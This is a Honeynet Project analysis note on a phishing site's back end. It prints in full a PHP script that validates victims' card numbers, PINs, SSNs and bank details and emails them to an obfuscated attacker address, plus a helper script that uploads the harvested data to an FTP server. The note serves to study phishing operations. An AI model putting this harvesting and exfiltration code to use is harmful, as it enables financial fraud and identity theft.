Honeynet Project
http://www.honeynet.org
Last Modified: 14th May, 2005
In this side note we analyse an example script that used to validate
the information entered by users into a HTML form on a phishing web site.
Initially the input data is checked to ensure that the submitted strings are valid.
For example, the PIN should be four characters long and the username
should not contain certain words. If the entered data passes this check, the
script constructs an e-mail message containing the user's information and sends it to an
address at a free e-mail provider. Finally, the location bar of the browser is
updated to point to the file xxxxISAPI.dll
(the file name has
been obfuscated). This page will
display a confirmation for the victim. In addition, a script was also included that could
be used to transfer the phished information to an FTP server.
<?php $errchk=0; $error = "None"; $badw="fuck pussy dick suck asshole"; //Checking for errors in the post: //1 - CC nr: if(strlen($ccnumber)<16){ $error="Invalid credit card number, please re-submit."; $errchk=1; } else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){ $error="Invalid credit card number, please re-submit."; $errchk=1; } //2 - Email syntax: else if(strstr($email, '@') == FALSE){ $error="Invalid email address, please re-submit."; $errchk=2; } //3 - Routing number (if it does exist) else if(strlen($bankr)>0 && strlen($bankr)<9){ $error="Invalid bank routing number, please re-submit."; $errchk=3; } //4 - CVV2 check else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){ $error="Invalid card validation code, please re-submit."; $errchk=4; } //4 - PIN check else if(strlen($ccp)!=4&&strlen($ccp)!=4){ $error="Invalid pin number, please re-submit."; $errchk=4; } //5 fields that should exist: else if(strlen($username)<1){ $error="Please enter your full name and re-submit."; $errchk=5; } else if(strlen($streetaddr)<1){ $error="Please enter your address and re-submit."; $errchk=5; } else if(strlen($cityaddr)<1){ $error="Please enter your city and re-submit."; $errchk=5; } else if(strlen($mmn)<1){ $error="Please enter your Mother Maiden Name and re-submit."; $errchk=5; } else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){ $error="Please enter your Date Of Birth and re-submit."; $errchk=5; } //6 - Bad words check else if(stristr($badw,$username)){ $error="ERROR - Invalid user name or password."; $errchk=6; } else if(stristr($badw,$streetaddr)){ $error="ERROR - Invalid user name or password."; $errchk=6; } else if(stristr($badw,$cityaddr)){ $error="ERROR - Invalid user name or password."; $errchk=6; } else if(stristr($badw,$mmn)){ $error="ERROR - Invalid user name or password."; $errchk=6; } //More coming soon:) //If no error: if($errchk==0) { $efile=fopen("/tmp/User.doc","r"); fscanf($efile,"%s",$userid); fscanf($efile,"%s",$pass); fclose($efile); $timed = date ("l dS of F Y h:i:s A"); $ip = $_SERVER["REMOTE_ADDR"]; $message="---------------------------------------------------------------------------- On $timed the user ($ip) wrote: CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year"; $message=$message."UserId - $userid"; $message=$message."Password - $pass"; $message=$message."Email - $email"; $message=$message."Email Password - $emailp"; $message=$message."Full Name - $username"; $message=$message."Address - $streetaddr"; $message=$message."City - $cityaddr"; $message=$message."State - $stateprovaddr"; $message=$message."Zip Code - $zipcodeaddr"; $message=$message."Phone number - $phone"; $message=$message."Country - $countryaddr"; $message=$message."CVV - $cvv2"; $message=$message."Bank Name - $bank"; $message=$message."Bank Routing # - $bankr Checking Account # - $bankc Social Security Number - $ssn Card PIN Number - $ccp Mother's Maiden Name - $mmn Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy Driver Licence Number - $dln"; mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From: tzonfi <xxxxxx@xxxxxx.com>\n"); header ("Location:xxxxISAPI.dll"); //$muie = fopen("/tmp/eb.txt", "a"); //fwrite($muie, $message); //fclose($muie); //include("cc-ftp.php"); exit(); } else { echo $error; } ?>
The script cc-ftp.php
(commented out in the data processing script above) will transfer the input to an
FTP server:
<?php include("r-config.php"); // the server login information $fcon = ftp_connect($host); if(@ftp_login($fcon, $user, $pass)) { ftp_put($fcon, $fremote, $flocal, FTP_ASCII); } else { $msg = "Unable to connect to host: $host with user: $user and pass: $pass. Please update me."; mail ("xxxxxx@xxxxxx","Ftpupdate","$msg","From:jmekeru <xxxxxx@xxxxxx>\n"); } ftp_close($fcon); ?>
Click here to return to the main paper.